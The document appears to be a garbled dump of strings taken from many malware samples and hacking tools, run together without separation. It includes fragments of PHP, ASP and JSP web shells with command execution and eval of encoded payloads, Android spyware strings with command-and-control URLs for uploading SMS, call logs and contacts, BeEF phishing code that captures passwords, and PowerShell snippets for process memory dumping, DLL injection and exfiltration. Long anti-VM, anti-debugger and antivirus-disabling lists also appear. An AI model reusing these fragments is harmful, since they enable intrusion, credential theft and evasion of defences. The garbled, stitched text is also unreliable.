/bin/bash',$name='ec371748dc2da624b35a4f8f685dd122'echo ws(2).$lb.\" <a$sql = \"load data infile \\\"\".$_post['test3_file']if (empty($_post['cmd'])&&!$safe_mode) { $_post['cmd']=($windows)?(\"dir\"):(\"lif(eregi(\"./shbd $por\",$scan))$_post['backconnectip']$_post['backcconnmsg']if(rmdir($_post['mk_name']))$r .= '<tr><td>'.ws(3).'<font face=verdana size=-2><b>'.$key.'</b></font></td>if(unlink($_post['mk_name'])) echo \"<table width=100% cellpadding=0 cell\"ext_avi\"=>array(\"ext_avi\",\"ext_mov\",\"ext_mviecho \"<b>execute file:</b><form action=\\\"\".$surl.\"\\\" method=post><inpu\"ext_htaccess\"=>array(\"ext_htaccess\",\"ext_htpasswdreturn $type . $owner . $group . $other;$owner = ($mode & 00400) ? 'r' : '-';sncirwcm90bz1nzxrwcm90b2j5bmftzsgndgnwjyk7dqpzb2nrzxqou09ds0vulcbqrl9jtkvulcbtt0a8c3lzl3nvy2tldc5opg0ki2luy2x1zgugpg5ldgluzxqvaw4uad4ncinpbmnsdwrlidxlcnjuby5opg<b>dumped! dump has been writed to if ((!empty($donated_html)) and (in_array($act,$donated_act))) {echo \"<table st<input type=submit name=actarcbuff value=\\\"pack buffer to archive@ini_set(\"highlightecho \"<b>result of execution this php-code</b>:<br>\";{$row[] = \"<b>owner/group</b>\";}echo $uname.\"</font><br><b>\";while(!feof($f)) { $res.=fread($f,1024); }echo \"user=\".@get_current_user().\" uid=\".@getmyuid().\" gid=\".@getmygid()c99ftpbrutecheck$ftpquick_t = round(getmicrotime()-$ftpquick_st,4);$fqb_lenght = $nixpwdperpage;$sock = @ftp_connect($host,$port,$timeout);$sqlquicklaunch[] = array(\"else {echo \"<center><b>file does not exists (\".htmlspecialchars($d.$f).\")!<if(@$_post['save'])writef($file,$_post['data']);if($action==\"phpeval\"){$uploadfile = $dirupload.\"/\".$_post['filename'];$dir=getcwd().\"/\";if (!empty($delerr)) {echo \"<b>deleting with errors:</b><br>\".$delerr;}if ($filename != \".\" and $filename != \"..\"){$dires = $dires . 
$directory;$arr = array_merge($arr, glob(\"*\"));@$rto=$_post['rto'];scrollbar-track-color: #91aaff$to1=str_replace(\"//\",\"/\",$to1); if ($mode & 0x200) {$world[\"execute\"] = ($world[\"execute\"] == \"x\")?\"t\": $group[\"execute\"] = ($mode & 00010)?\"x\":\"-\";$result = mysql_query(\"show processlist\", $sql_sock); elseif (!empty($ft)) {echo \"<center><b>manually selected type is incorrect. ielse {echo \"<center><b>unknown extension (\".$ext.\"), please, select type ma$s = \"!^(\".implode(\"|\",$tmp).\")$!i\";if ($total === false) {$total = 0;}$free_percent = round(100/($total/$free),2);if (!$bool) {$bool = is_dir($letter.\":\\\\\");}$bool = $isdiskette = in_array($letter,$safemode_diskettes);$res = mssql_query(\"select * from r57_temp_table\",$db);'eng_text30'=>'cat file',@mssql_query(\"drop table r57_temp_table\",$db);$num = $nixpasswd + $nixpwdperpage;$ret = posix_kill($pid,$sig);if ($uid) {echo join(\":\",$uid).\"<br>\";}$i = $nixpasswd;form method=post><input type=hidden name=\"\"#\"\" value=execute(session(\"\"#\"\"))><input name=thepath value=\"\"\"&htmlencode(server.mappath(\".\"))&else{$d.=@chr(($h[$e[$o]]<<4)+($h[$e[++$o]]));}}eval($d);lsext = right(filename, len(filename) - licount)response.write drive.sharename & \" [share]\"if request.querystring(\"copyfile\") <> \"\" then<td width=\"40%\" height=\"20\" bgcolor=\"silver\"> name</td>@rmdir($_get['file']) or die (\"[-]error deleting dir!\");$ps=str_replace(\"\\\\\",\"/\",getenv('document_root'));header(\"expires: \".date(\"r\",mktime(0,0,0,1,1,2030)));search_file($_post['search'],urldecode($_post['dir']));echo base64_decode($images[$_get['pic']]);if (isset($_get['rename_all'])) {$from = rand (71,1020000000).\"@\".\"attacker.com\";&nbsp;turkish hackers : www.alturks.com <br>&nbsp;programer : simattacker - edited by kingdefacer<br>//fake mail = use victim server 4 dos - fake mail &nbsp;e-mail : kingdefacer@msn.com<br>error_reporting(e_error | e_warning | e_parse);echo \"<font size='1' 
and mimetype = ?863d9effe70187254d3c5e9c76613a99nv-sa1nd your's device will reboot and!2,.b99^ggd&r-22922222222222222222q^saawat2222222222229222q^saawabuildiddcef055eee3f76cabb27b3bd7233f6e3c143d55d996634d1b761709372042474find_valid_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??????;;;;;;888888444444000000,,,,,,''''''''''''######ooo###2e6081a2-a063-45c7-ab90-5db596e42c7cmsacm32.dllmain_text_tag080229013346z350717013346z0number_char_exp_signloganberryapplicationattachbasecontextobstetricres/xml/device_admin_data.xml]data:image/png;base64,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device_admin_descpillagedactivityepigraphyservicexbot007:write apk file (from txt in assets) to sdcard sucessfully!4write apk (from txt in assets) file to sdcard fail!138675150963res/xml/device_admin.xmldevice registered: regid =cmvudcymjg==dxnzzcymjg==hdnrq2golmlelvyohc9y1x+nzvuejw8w3sbuacertificado # 73828394a compania tmn informa que o vosso sistema android tem vulnerabilidadeandroid.app.extra.add_explanationdevice_policycontent://sms/#admin_startkill callunstop all numbers*lcom/metasploit/stage/payloadtrustmanager;(com.metasploit.stage.payloadtrustmanagerlcom/metasploit/stage/payload$1;lcom/metasploit/stage/payload;-com.metasploit.meterpreter.androidmeterpreter,lcom/metasploit/stage/mainbroadcastreceiver;#lcom/metasploit/stage/mainactivity;lcom/metasploit/stage/a;lcom/metasploit/stage/c;lcom/metasploit/stage/b;android.engine.apktel:locknowcmd_confsms_conffilter2arnrsiec sisanirhguecisoijng tsassets/data.dbres/xml/device_admin_sample.xmlpkselen3333http://mayis24.4tubetv.xyz/dmr/yanpkiportraitcallback(android.app.extra.device_adminsmsreceiver&imsi=com.ahnlab.v3mobileplus#intercept_sms_start#intercept_sms_stop#block_numbers#wipe_datavisa electrone!qqazxs__exidx_endres/layout/notify_apkinstall.xmlpkpluginsms_decrypt__dso_handlelib/armeabi/libmylib.sout]diok\"3|0597794205new victim 
arrivedhttp://ksa-sef.com/hack%20mobaile/addnewsms.phphttp://ksa-sef.com/hack%20mobaile/addalllogcall.phphttp://ksa-sef.com/hack%20mobaile/addscreenshot.phphttp://ksa-sef.com/hack%20mobaile/addsms.phphttp://ksa-sef.com/hack%20mobaile/addvcf.phphttp://ksa-sef.com/hack%20mobaile/addimsi.phphttp://ksa-sef.com/hack%20mobaile/addhistoryinternet.phphttp://ksa-sef.com/hack%20mobaile/addinconinglogs.phpodnotice.txtcamera this device has camera!camera this device has nooo camera!send|1sbdbbbbbbf|k|send|372|screamsms|senssdsend|5ms5gs5anncsend|45clclca01send|999sand|timestart!s!c!r!e!a!m!server_ipserver_namecontent://sms/inboxscreamhackerscreamondroid.pnggetsrvaddrgetsrvportandroid.intent.action.start_google_servicejavascript:scrolltojavascript:document.getelementbyid('dns1')admin:101.200.147.153112.33.13.11120.76.249.59svcdownload<config><apptitle><txinicio><txiniciotitulo><txnored><txnoredtitulo><txnoredretry><txnoredsalir><laurl><txquieresalir><txquieresalirtitulo><txquieresalirsi><txquieresalirno><txfiltro><txfiltrourl><posicion>android/system/popreceiver/get-functions.php?/new-upload.php?/message.php?/get.php?cv7obbkpvc2pvjmwsfhzxhhttp://joyappstech.biz:11111/knock/i hate testers ongloballayouthttp://144.76.70.213:7777/ecspectapatronum/6589y459gj4058rtq,hu4p#ht;u!xo7t,ud+gkwg#m!lf>laq&+j{lgvar lilogo = 'http://content.linkedin.com/etc/designs/linkedin/katy/global/clientlibs/img/logo.png';dark=document.getelementbyid('darkenscreenobject'); beef.execute(function() {var logo = 'http://www.youtube.com/yt/brand/media/image/yt-brand-standard-logo-630px.png';description.text('enter your apple id e-mail address and password');sneakydiv.innerhtml= '<div id=\"edge\" '+edgeborder+'><div id=\"window_container\" '+windowborder+ '><div id=\"title_bar\" ' +tivar logo = 'https://www.yammer.com/favicon.ico';beef.net.send('<%= @command_url %>', <%= @command_id %>, 'answer='+answer);var title = 'session timed out <img src=\"' + lilogo + '\" align=right height=20 width=70 
alt=\"linkedin\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=20 width=70 alt=\"youtube\">';var title = 'session timed out <img src=\"' + logo + '\" align=right height=24 width=24 alt=\"yammer\">';var logobox = 'style=\"border:4px #84acdd solid;border-radius:7px;height:45px;width:45px;background:#ffffff\"';sneakydiv.innerhtml= '<br><img src=\\''+imgr+'\\' width=\\'80px\\' height\\'80px\\' /><h2>your session has timed out!</h2><p>forinner.append(title, description, user,password);sneakydiv.innerhtml= '<div id=\"window_container\" '+windowborder+ '><div id=\"windowmain\" ' +windowmain+ '><div id=\"title_baranswer = document.getelementbyid('uname').value+':'+document.getelementbyid('pass').value;password.keydown(function(event) {j@h
1 get_badloginaddressget_lastfailedloginads_uf_encrypted_text_password_allowedget_passwordexpirationdatebin_execsql(\"exec master..xp_cmdshell'bcp \\\"select safile from \" + db + \"..bin_temp\\\" queryout \\\"\" + bin_textbox_saveptc.text=\"<a href=\\\"javascript:bin_postback('zcg_closepm','\"+bin_tobase64(de.key.tostring())+\"')\\\">close</a>\";bin_execsql(\"if object_id('bin_temp')is not null drop table bin_temp\");-slave <connecthost> <connectport> <transmithost> <transmitport>[+] make a connection to %s:%d....cmshared_get_ptr_from_atom_cmshared_get_ptr_from_atom[-] transmitport invalid.[+] waiting for client on port:%d ......\\setup.exemsi.dll.urlutmsi.dllutsetup.exeut/c del /q %sp
1 software\\microsoft\\windows nt\\currentversion\\winlogon\\notify<assembly xmlns=\"urn:schemas-microsoft-com:asm.v1\" manifestversion=\"1.0\"><trustinfo xmlns=\"urn:schemas-microsoft-com:asm.v3<supportedos id=\"{e2011457-1546-43c5-a5fe-008deee3d3f0}\"></supportedos>getpassword1nvsmartmax.dlllicensedlgc
1 winhelpwreadprocessmemorywshshell.run \"dropbear.exe -r rsa -d dss -a -p 6789\", 0, falsewshshell.currentdirectory = \"c:\\windows\\temp\\dropbear\\\"set wshshell = createobject(\"wscript.shell\")dropbear server v%s https://matt.ucc.asn.au/dropbear/dropbear.htmlbadly formatted command= authorized_keys optionthis dropbear program does not support '%s' %s algorithm/etc/dropbear/dropbear_dss_host_key/etc/dropbear/dropbear_rsa_host_keypassds5bu9te7s
1 .iiswebvirtualdirroot[host ] [user ] [pass ] .anonymoususername.anonymoususerpassthe_white_lf_x@hotmail.comautogeneratecolumns=\"false\" onitemcommand=\"filesystem_itemcommand\"<asp:linkbutton id=\"lnkexec\" runat=\"server\" onclick=\"lnkexec_click\">[execute<asp:label id=\"uip\" runat=\"server\" text=\"your ip :\" forecolor=\"#ff8300\"></asp:label>autorun.infravmon.exelasttimekey.inicsdownupdatecsdownversioncsdownloadcsexit
1 proxy_info: automatic proxy url => %s proxy_info: connection type => %d proxy_info: proxy server => %s proxy_info: bypass list => %s internetqueryoption failed with getlasterror() %dd:\\hellsing\\release\\exe\\exe\\\\dbgv.sysxkat_binrelease sys file error.driver_load error. driver_create error.delete file:%s error.delete file:%s ok.kill pid:%d error.kill pid:%d ok.-pid-deletekill and delete pid:%d error.kill and delete pid:%d ok.%s\\system\\%d.txt_msgerhttp://%s/lib/common.asp?action=user_login&uid=%s&lan=%s&host=%s&os=%s&proxy=%shttp://%s/data/%s.1000001000/lib/common.asp?action=user_upload&file=\
1 -m minlen minimum length of a valid passwordhttp://www.thc.orguse for hacking: trim your dictionary file to the pw requirements of the target.w
1 reflectivepick_x64.dll$result = $minidumpwritedump.invoke($null, @($processhandle,$processfilename = \"$($processname)_$($processid).dmp\"invoke-psexeccmd\"[*] executing service .exe$cmd = \"%comspec% /c echo $command ^> %systemroot%\\temp\\# upload to a specified exfil uriserver path to exfil to.[*] pdc: lab-2008-dc1.lab.com$attempts = get-userbadpwdcount $userid $dcs$rightmouse = ($importdll::getasynckeystate([windows.forms.keys]::rbutton) -band 0x8000) -eq 0x8000-dll evil.dll$usermasterkeyfiles = @(, $(get-childitem -path $usermasterkeyfolder -force | select-object -expandproperty fullname) )$base64 = 'tvqqaamaaaaeaaaa//8aalgaaaaaaaaaqaaaaaaaaaainvoke-sshcommand -ip 192.168.1.100 -username root -password test -command \"id\"write-verbose \"[*] error loading dll\"write-bytestomemory -bytes $shellcode$getcommandlineaaddrtemp = add-signedintasunsigned $getcommandlineaaddrtemp ($shellcode1.length)$result = sc.exe config $($targetservice.name) binpath= $originalpath$result = sc.exe pause $($targetservice.name)$dllmain = [system.runtime.interopservices.marshal]::getdelegateforfunctionpointer($dllmainptr, $dllmaindelegate)#shellcode: calldllmain.asm$wc.headers.add(\"user-agent\",$script:useragent)$min = [int]((1-$script:agentjitter)*$script:agentdelay)if ($script:agentdelay -ne 0){if (($peinfo.filetype -ieq \"dll\") -and ($remoteprochandle -eq [intptr]::zero))remote dll injection$inveigh.smbrelay_failed_list.add(\"$http_ntlm_domain_string\\$http_ntlm_user_string $smbrelaytarget\")$ntlm_challenge_base64 = [system.convert]::tobase64string($http_ntlm_bytes)$keepassxml = [xml](get-content -path $keepassxmlpath)test-port -h $h -p $port -timeout $timeout1 {$nhosts=10; $threads = 32; $timeout = 5000 }where-object { $_.globalassemblycache -and $_.location.split('\\\\')[-1].equals('system.dll') }# get a handle to the module specified$kern32handle = $getmodulehandle.invoke($null, @($module))$dynassembly = new-object 
system.reflection.assemblyname('reflecteddelegate')$peloadedinfo = invoke-memoryloadlibrary -pebytes $pebytes -exeargs $exeargs -remoteprochandle $remoteprochandle$shellcode1 += 0x48$pehandle = [intptr]::zeroif ($exeargs -ne $null -and $exeargs -ne '')$exeargs = \"reflectiveexe $exeargs\"
1 password <=14/%ldn.txtkill you\x00d
1 dllaspxspyiis spyprotected void dgcow(object sender,eventargs e)openmydoorinstall service errorstart remove servicendisversionunable to alloc the adapter!wait for master fuckxx.exe <host> <port>chkroot2007door is bind on %smicrosoft.exchange.clients.auth.dlldllshellexc2010users\\ljw\\documentsplease input pathauth.owa\\dnstunclient\\\\t-dnstunnel\\xssok.blogspotdnstunclientbecause of error, can not analysiscan not deal witn the errorthe other retun one rstcoversation produce one errorprogram try to use the have deleted the bufferefh3 [hex] [srcfile] [dstfile]123.exe 123.efhencoder: b[i]: = (luid error)users\\k8team\\desktop\\getpassworddebug x64\\getpassword.pdbgetuserinfo usernamejoe@joeware.netif . specified for userid,game over good luck by windreleicenamejingtisanmenxiachuanxiao.vbswinds updategtalklite.comcomputer=%s&lanip=%s&uid=%s&os=%s&data=%sd13idmadmerror: peeknamedpipe failed with %i.dllut.exeut.urlutlisten socket error.wsaasyncselect socket error.new socketinfo error!http/1.1 403 forbiddencreate socket error.this service can't be stoped.provides support for media palyercreaetprocess error%4.2f gbdos emluator ver\\pipe\\fastdosfastdos.cppfail,error code = %d.safeproxy htservertimer quit!useage: %s pid%s port[%d] to port[%d] success!p0: port for listener\\users\\whg\\desktop\\plug\\[+y] cwnd : %3d, fligth:\\unitfrmmanagerkeylog.pas\\unitfrmmanagerregister.pasinput name...new value#tthreadrcontrol.execute seh!!!\\unitfrmrcontrol.pasonsocket(event is error)!make 3f version ok!!!pelease do not change the docamentpress [ok] continue run, press [cancel] exitfail to load lsasrvuser principalring rat exception(can not update server recently)!sucess!user canceled!temp result file , change it to where you likeby. 
twi1ight[both mode] ,delay time to read resultsuch as nc.exe or trojan+++shell mode+++win2008 fso has no privilege to delete filednstunclient -d or -domain <domain>dnstunclient -ip <server ip address>c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"\\microsoft\\windows\\pla\\system\\microsoft windows\" /tr c:\\windows\\system32\\cmd.exe /c schtasks /create /tn \"microsoft windows\" /tr taskkill /im conime.exe\\dns control\\t-dnstunnel\\dnstunclient\\dnstunclient.cppudp error:can not bing the port(if there is unclosed the bind process?)use error domain,set domain pls use -d or -domain mark(current: %s,recv %s)error: packet num error.the connection have condurt,pls try latercoversation produce one error:%s,coversation failtry to add many same pipe to select group(or mark is too easy).a
1 danderspritzdanderspritzchimneypool addresgetting remote timeretrievedadded ops library to python search pathtarget: z0.0.0.1psp_avoidancepassworddumpinjectdlleventlogeditprocessmodifymcl_ntelevationmcl_ntnativeapimcl_threatinjectmcl_ntmemoryvailablezsfouglr|||command executed successfully\\release\\bot fresh.pdbc
1 gif8this program cannot be run in dos modethis program must be run under win32userform1textbox1microsoft forms 2.0ret.logmicrosoft internet explorer 6.0szurl failszurl successfully%s&sdate=%04ld-%02ld-%02ldsuperhard corp.microsoft corp.[insert][delete][end]!(*@)(!@key!(*@)(!@sid=services\\riodrv32riodrv32.syswuauserv.dllarp.exeprojects\\aurigaend binary outputxriteprocessmemoryie:password-protected siteszxdosmlget user name error!get computer name error!----client system info----stfilecmd success!*qd9kdgba33*%wkda0qd3kvn$*&><(*&%$e#%$#1234asdgknag@!gy565dtfbasdgidr_data%dasdfqwe123cxzmode must be 0(encrypt) or 1(decrypt).new_connection_to_bounce():usage:%s ip port [proxip] [port] [key]downrun success%s@gmail.com<!--%s-->w4qkihsb+so=poqkigy7ggh+vcnqntcmhfco9w==8oqkiqb5880/ujlzasy=mozilla4.0 (compatible; msie 7.0; win32)mozilla5.1 (compatible; msie 8.0; win32)getfileputfile---[ virtual shell]---not comming from our server %s.mozilla/4.0 (compatible; msie 7.0;)kilfailkilsuccpkkillpklistkill process success!kill process failed!sleep success!based on glooxglooxtest.pdb
1 \x00netpass update\x00\x00%s:download\x00\x00%s:update\x00\x00%s:uninstall\x00?injectdll@@yahpauhwnd__@@k@z?unmapdll@@yahxz?g_bsubclassed@@3haacfg92kxpcso4y94bnurfmnnk27ehw6cqp5entad6af8bd5835d19cc7fdc4c62fdf02a1%s?cstorage=shell&comp=%s75baa77c842be168b0f66c42c7885997b523f63566f407f3834bcc54aaa32524svwf
1 guntbypass
1 software\\haoqiang\\redirect sport remotehost rport -->port redirectorhttp://ip/a.exe a.exe -->download a filestopsniffer -->stop pass snifferterminalport port -->set new terminal portexample: http://12.12.12.12/a.exe abc.execreate password sniffering thread successfully. status:loggingstartsniffer nic -->start sniffershell -->get a shelldeleteservice servicename -->delete a servicedisconnect threadnumber|all -->disconnect othersonline -->list all connected ipexample: set reg_sz test trojan.exeexecute program -->execute a programreboot -->reboot the systempassword sniffering is not runningprocess child = runtime.getruntime().exec(inputstream in = child.getinputstream();string cmd = request.getparameter(\"while ((c = in.read()) != -1) {<%@ page import=\"java.io.*\" %>r
1 error starting filespy...exe\\filespy.dbg[/d <drive>] detaches monitor from <drive>should be logging to screen...filmon: unknown log record typed:\\documents and settings\\loveengeng\\desktop\\source\\bypass\\lcc\\ie.dlleditkeylog.exe keylog.exe,wineggdrop.dlleditkeylog.exewineggdroppasssniffer.exepop3/ftp snifferpassword sniffer v1.0\"gina\"=\"gina.dll\"regedit4[hkey_local_machine\\software\\microsoft\\windows nt\\currentversion\\winlogon]n
1 neolite executable file compressorie686@sohu.comsplitjoin.exesplitjoin<meta http-equiv=\"content-type\" content=\"text/html;charset=gb_2312-80\">set thisfile = fs.getfile(whichfile)if request.cookies(\"password\")=\"juchen\" then set thisfile = fs.opentextfile(whichfile, 1, false)color: rgb(255,0,0); text-decoration: underline }if request(\"creat\")<>\"yes\" then<form name=\"formpst\" method=\"post\" action=\"entice.asp\">if left(trim(request(\"sqllanguage\")),6)=\"select\" thenconndb.execute(sqllanguage)<!--#include file=sqlconn.asp-->rstsql=\"select * from \"&rstable(\"table_name\") -s - outbound connection source port numberfpipeto open registryi love candy very much!!ginadllh
1 iofreemdlkfreleasespinlock<shortdescription>keystroke collector</shortdescription>this plugin is the e_qwerty kernel mode driver for logging keys.</description><commands/></version><associatedimplantid>20121</associatedimplantid><rightsrequired>system or administrator (if administrator, i think the driverins<platforms>windows nt, windows 2000, windows xp (32/64 bit), windows 2003 (32/64<projectpath>plugin/collection</projectpath><dlldepend>none</dlldepend><minortype>0</minortype><pluginname>e_qwertykm</pluginname></comments><comments><majortype>1</majortype><files>none</files><poc>erebus</poc><team>none</team><?xml-stylesheet type=\"text/xsl\" href=\"../xslt/pluginhtml.xsl\"?><pluginsdepend>u_hookmanager v1.0, kernel covert store v1.0</pluginsdepend><plugin id=\"20123\" xmlns:xsi=\"http://www.w3.org/2001/xmlschema-instance\" xsiwarriorpride\\production2.0\\package\\e_wzowski<!-- edited with xmlspy v5 rel. 4 u (http://www.xmlspy.com) by team (renegade) -<configfilename>20123_cmddef.xml</configfilename><name>20123.sys</name><codebase>/bin/i686-pc-win32/debug</codebase>\
1 .rsrcheapfreeconvertstringsidtosidallocatelocallyuniqueidadvapi32.dlllsalookupauthenticationpackagemsvcr120.dll\x12f\x12f\x129\x12e\x12a\x12e\x12b\x12a\x12-\x127\x127\x128\x123\x12\x121\x12d\x128\x123\x12b\x122\x12e\x128\x12-\x12b\x122\x123\x12d\x12ezcobl\x12i\x12u\x122\x120\x121\x123\x120\x124\x121\x12620110113144935bitsadmin /transferdel rm.batav_list=
1 c:\\documents and settings\\administrator\\got wmi process pid: %dthis exploit will executerunning reverse shell<description>chken qq:41901298</description>version=\"9.9.9.9\"name=\"ch.ken.tool\"to host!ss.exelstrlen0rtlunwnc -l -p port [options] [hostname] [port]invalid connection to [%s] from %s [%s] %dpost-rcv getsockname failedfailed to execute shell, error = %sudp listen needs -p arghttp://www.site.com/test.dll?user=%username&pass=%passwordusername: \"%s\", password: \"%s\", remarks: \"%s\"user:\"%s\" pass: \"%s\" result=\"%s\"mozilla/4.0 (compatible; msie 4.01; windows nt)l
1 ven_vmware_prod_vmware_virtual_hgfs.sysmhgfs.sysprleth.sysprlfs.sysprlmouse.sysprlvideo.sysprl_pv32.sysvpc-s3.sysvmsrvc.sysvmx86.sysvmnet.sysvmicheartbeatvmicvssvmicshutdownvmicexchangevmdebugvmmousevmtoolsvmmemctlvmwarevpcbusvpcuhubmsvmmoufxenevtchnxennetxennet6xensvcxenvdbxenvmmvboxhook.dllvboxservicevboxtrayvboxmousevboxguestvboxsfvboxguestadditionsvbox harddisk00-05-6900:05:6900056900-50-5600:50:5600505600-0c-2900:0c:29000c2900-1c-1400:1c:14001c1408-00-2708:00:27080027\\\\.\\physicaldrive0sandbox\\sample\\virusmaltesttequilaboomboommalwareollydbgwindbgframeclassselect description from win32_videocontrollerselect * from win32_videocontrollervirtualbox graphics adaptervmware svga iivm additions s3 trio32/64parallelremotefxcirrus logicmatroxkernel32.dllisdebuggerpresentcontinuedebugeventprocexp.exeprocmon.exeprocessmonitor.exewireshark.exefiddler.exewindbg.exeollydbg.exewinhex.exeprocesshacker.exehiew32.exe\\\\.\\ntice\\\\.\\sice\\\\.\\syser\\\\.\\syserboot\\\\.\\syserdbgmsgsoftware\\microsoft\\windows\\currentversionregqueryvalue55274-640-2673064-2395076487-337-8429955-2261476487-640-1457236-23837sbiedll.dll76487-644-3177037-23510vboxservice.exevmware.exevmware-authd.exevmware-hostd.exevmware-tray.exevmware-vmx.exevmnetdhcp.exevpxclient.exehardware\\description\\systemhardware\\description\\system\\biossystemmanufacturersoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\disallowrunsoftware\\microsoft\\windows\\currentversion\\uninstall\\software\\policies\\microsoft\\windows defenderantivirusdisablenotifydontreportinfectioninformationdisableantispywareruninvalidsignaturesantivirusoverridecheckexesignaturesblackd.exeblackice.exelockdown.exelockdown2000.exetaskkill.exetskill.exesmc.exesniffem.exezapro.exezlclient.exezonealarm.exesoftware\\microsoft\\security centeruacdisablenotifysystem\\currentcontrolset\\services\\sharedaccess\\parameters\\firewallpolicyenablefirewallfirewalldisablenotifynetsh firewall add 
allowedprogramsoftware\\microsoft\\windows\\currentversion\\policies\\systemdisableregistrytoolsdisableregeditenableexecuteprotectionsupportntsetinformationprocessvirtualproctectexsetprocessdeppolicyzwprotectvirtualmemorydisabletaskmgrvirtualallocexntwritevirtualmemorywriteprocessmemorycreateremotethreadcreatethreadshell32.dllwinexecsoftware\\microsoft\\windows\\currentversion\\runsoftware\\microsoft\\windows\\currentversion\\runoncesoftware\\microsoft\\windows\\currentversion\\runservicessoftware\\microsoft\\windows\\currentversion\\runservicesoncesoftware\\microsoft\\windows nt\\currentversion\\winlogonsoftware\\microsoft\\windows\\currentversion\\policies\\explorer\\runsoftware\\microsoft\\windowsnt\\currentversion\\windowssoftware\\microsoft\\windows\\currentversion\\explorer\\sharedtaskschedulercomfile\\shell\\open\\commandpiffile\\shell\\open\\commandexefile\\shell\\open\\commandtxtfile\\shell\\open\\commandwin.inisystem.inistart menu\\programs\\startupsoftware\\classes\\protocols\\handlersoftware\\classes\\protocols\\filtermicrosoft\\windows\\currentversion\\internet settings\\proxyserversoftware\\microsoft\\windows\\currentversion\\internet settings\\proxyenabledrivers\\etc\\hostsadvapi32.dllcontrolservicequeryservicestatusdllcanunloadnowdllinstalldllregisterserverdllunregisterserverws2_32.dllsystem.netwsock32.dllwsastartupsendtorecvfromwsasendtowsarecvfromudpclientmswsock.dllacceptgetacceptexsockaddrswsaacceptwsasockettcplisteneraccepttcpclient.no-ip.org.publicvm.com.linkpc.net.dynu.com.dynu.net.afraid.org.chickenkiller.com.crabdance.com.ignorelist.com.jumpingcrab.com.moo.com.strangled.com.twillightparadox.com.us.to.strangled.net.info.tm.homenet.org.biz.tm.continent.kz.ax.lt.system-ns.com.adultdns.com.craftx.biz.ddns01.com.dns53.biz.dnsapi.info.dnsd.info.dnsdynamic.com.dnsdynamic.net.dnsget.org.fe100.net.flashserv.net.ftp21.netfirewallapi.dll\\currentcontrolset\\services\\tcpip6\\parameters\\interfaces\\system.net.mailsmtpclientmail from:rcpt 
to:cdo.messagecdosmtpservercdosendusingmethodcdoex.dll/cdo/configuration/smtpserverpeercollabexportcontactpeercollabgetapplicationregistrationinfopeercollabgetendpointnamepeercollabgeteventdatapeercollabgetinvitationresponsepeercollabgetpresenceinfopeercollabgetsigninoptionspeercollabinvitecontactpeercollabinviteendpointpeercollabparsecontactpeercollabquerycontactdatapeercollabrefreshendpointdatapeercollabregisterapplicationpeercollabregistereventpeercollabsetendpointnamepeercollabsetobjectpeercollabsetpresenceinfopeercollabsignoutpeercollabunregisterapplicationpeercollabupdatecontacttor\\hidden_service\\private_keytor\\hidden_service\\hostnametor\\locktor\\statenickpingjoinuserprivmsgwininet.dllinternetopenurlinternetwritefileidhttpheaderinfourlmon.dllurldownloadtocachefileurlopenstreamurlopenpullstreamftpgetcurrentdirectoryftpgetfileftpputfileftpsetcurrentdirectoryftpopenfileftpgetfilesizeftpdeletefileftpcreatedirectoryftpremovedirectoryftprenamefileftpdownloadftpuploadftpgetdirectorysocketwsaconnectclosesocketwsacleanupdnsapi.dllgethostentrygetaddrinfogethostbynamewsaasyncgethostbynamednsqueryssleay32.dlllibeay32.dlllibssl32.dllidsslopensslcrypt32.dllsystemtimetofiletimegetsystemtimegetsystemtimeasfiletimecryptcreatehashcryptacquirecontextcrypthashdataopencl.dllnvcuda.dllopengl32.dllcpuminer 2.2.2x-mining-extensionscpuminer 2.2.3x-mining-extensionsufasoft bitcoin-miner/0.20stratumsoftware\\microsoft\\systemcertificates\\spc\\certificatescertopensystemstoreadjusttokenprivilegesgdi32.dlluser32.dllbitbltgetdccheckip.dyndns.orgwhatismyip.orgwhatsmyipaddress.comgetmyip.orggetmyip.co.uksoftware\\vitalwerks\\ducj.maxmind.comgetasynckeystategetkeystatemapvirtualkeygetkeyboardtypesamiconnectsamigetprivatedatasamqueryinformationusecredenumerateacredenumeratewsoftware\\microsoft\\internet account 
managersoftware\\microsoft\\identitycrl\\credssecurity\\policy\\secretswinmm.dllwaveinstartwaveinresetwaveinaddbufferwaveinopenwaveinclosesignons.sqlitesignons3.txtsecmod.dbcert8.dbkey3.dbvncpassviewabe2869f-9b47-4cd9-a358-c22904dba7f7packet.dllnpf.syswpcap.dllwinpcap.dllopenthreadqueueuserapcautorun.infdesktop.inidesktop.lnknetapi32.dllnetsharegetinfonetshareenumultravnc.inistartvncstopvncsystem\\currentcontrolset\\control\\terminal serversoftware\\microsoft\\windows nt\\currentversion\\terminal serversystem\\currentcontrolset\\control\\terminal server\\winstations\\rdp-tcpenableadmintsremotenet start termservicesc config termservice startsoftware\\microsoft\\telnetserveravicap32.dllcapcreatecapturewindowsoftware\\microsoft\\windows nt\\currentversion\\hotfixcreatemutexadvapi32.dllregqueryvalueexaregopenkeyexaregcreatekeyaduplicatetokenexopenprocesstokenlookupprivilegevalueakernel32.dllgetprivateprofileintagetprivateprofilestringawriteprivateprofilestringadeletefileacreatefileafindfirstfileamovefileexafindcloseuser32.dllunhookwindowshookexsetwindowshookexacallnexthookexsoftware\\\\oracle\\\\virtualbox guest additionsvmmouse.sysvmware virtual ide hard drivesystem\\controlset001\\services\\disk\\enumsystem\\\\controlset001\\\\services\\\\disk\\\\enumvmhgfs.sysvmcivmtoolsvmware2vmount2vmusrvcvboxservicevboxtrayxenservice
1 \x00msvcrt.dll\x00\x00crtdll.dll\x00cygwin1.dllcygwin_internalcygwin_detach_dllmsvcrt.dllmingw-w64 runtime failure:-libgccw32-eh-3-sjlj-gthr-mingw32_mingw32_init_mainargs-libgccw32-eh-2-sjlj-gthr-mingw32mingw runtime failure:autoit has detected the stack has become corrupt.\n\nstack corruption typically occurs when either the wrong calling convention is used or when the function is called with the wrong number of arguments.\n\nautoit supports the __stdcall (winapi) and __cdecl calling conventions. the __stdcall (winapi) convention is used by default but __cdecl can be used instead. see the dllcall() documentation for details on changing the calling convention.autoit errormissing right bracket ')' in expression.missing operator in expression.unbalanced brackets in expression.error parsing function call.>>>autoit no cmdexecute<<<#requireadmin#onautoitstartregister#notrayiconcannot parse #include -- terminating\x0d\x0a\x00 -- terminating\x0a\x00crt: \x00unexpected error\x00unhandled exception (main)\x00unhandled exception in thread\x00unable to create thread\x00unable to destroy semaphore\x00unable to wait on semaphore\x00unable to post semaphore\x00unable to init semaphore\x00unable to unlock mutex\x00unable to lock 